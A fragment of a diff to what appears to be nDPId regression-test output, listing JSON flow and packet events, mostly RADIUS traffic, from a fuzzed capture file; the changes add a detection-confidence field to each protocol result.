+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00631{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"VRRP","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}}
 00615{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2560,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"ts_msec":1528997988838,"pkt":"ABRP+4rqcNuYVcUnCgBFAADhCANAAPwRS8fG4hk1CgxAHgcUchAAzcqaC4QAxQGJ6Lj45v3l8O9jNbsTb\/MBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0T0oBAhBIFwEAAAEFAAD7NrjaxmMHv4vIE1TL2G1wAgUAANQK+SugcQAAjldODJoz\/yqLAQACCwUAAPFizAqNmvaDbjPlWgGZGZpQEuJJeKWQmKkvyDnGACXbYRU="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2560}
 01259{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":245,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997989240,"pkt":"AAAMB6xAABRP+4olAABFAALHITdAAP8RAAAKDEAexuIZNXIQBxQCswAAAYUCq1+INwexFZhfJQDfuQscp+waCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqhlATUwMzExNDgwMDczNjM4MDcyQHdsYW4QbW5jNDg2Lm1jYzMxMS5EZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAAGjEAAAAJASthdWRpdC1zZXNzae9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1YiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABZU9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAAqyk7MPy+\/53EGG8G21R64AwIAIEnDCioaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyEgERVSpEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0Q0xhYhoJAADXyA8DMRoKAABXsBAETkpHEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaNQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbCUAIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQElQJdBGjY0wxqxPERz7qHjo="}
@@ -388,38 +388,38 @@
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284}
 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1528997997929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":691,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":691,"pkt_l4_len":657,"ts_msec":1528997997929,"pkt":"AAAMB6xAABRP+4rqCABFAAKlIThAAP8RAAAKDEAexuIZNXIQBxUCkQAABIYCiWTbrkYoE6dP3NRell25+W4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzkBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1Yi0GAAAAAUAGAAAADEEGAAAABlEENTY3BlsiqG0aFAAAV8gHDlZaV0MyVEMkdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExdHMC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUaAAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAVAAEfE2YwLTc5LTYwLWQxLTdkLTM3HiUlAC1hNy00Jaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1528997998006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"ts_msec":1528997998006,"pkt":"ABRP+4rqcNuYVcUnCABFAACF2NZAAPwRe0\/G4hk1CgxAHgcVchAAcWngBYYAafOBk\/MbbTEmOF2SETjhcxsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0"}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998008890,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998008890,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1528998009111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998009111,"pkt":"ABRP+4rqcNuYVcUnCABFAADhCFZAAPsRTHTG4hk1QQxAHgcUchAAzZhiC4cAxfpcYMkIJQAq\/AYDHQwJPKgBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAAD1MaNN\/eVrXVA5NyB7PdAiAgUAAKijzKdTogAAg+UMifaIvECLAQACCQUAAKm646oYz3UcK6LI7VxSaVlQEnCDxzf23chcIFKFSs5a0So="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1528998013338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"ts_msec":1528998013338,"pkt":"AAAMB6xAABRP+4rqCABFAAKRITtAAP8RAAAKDEUexuIZNXIQBxUCfQAABIkCdRaYwGBcpHTMfyd7vuQnfxIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTYkMaCQAAOCENAzGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":113,"flow_first_seen":1528996996259,"flow_last_seen":1528998009523,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":50383,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":113,"flow_first_seen":1528996996259,"flow_last_seen":1528998009523,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":50383,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":180000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
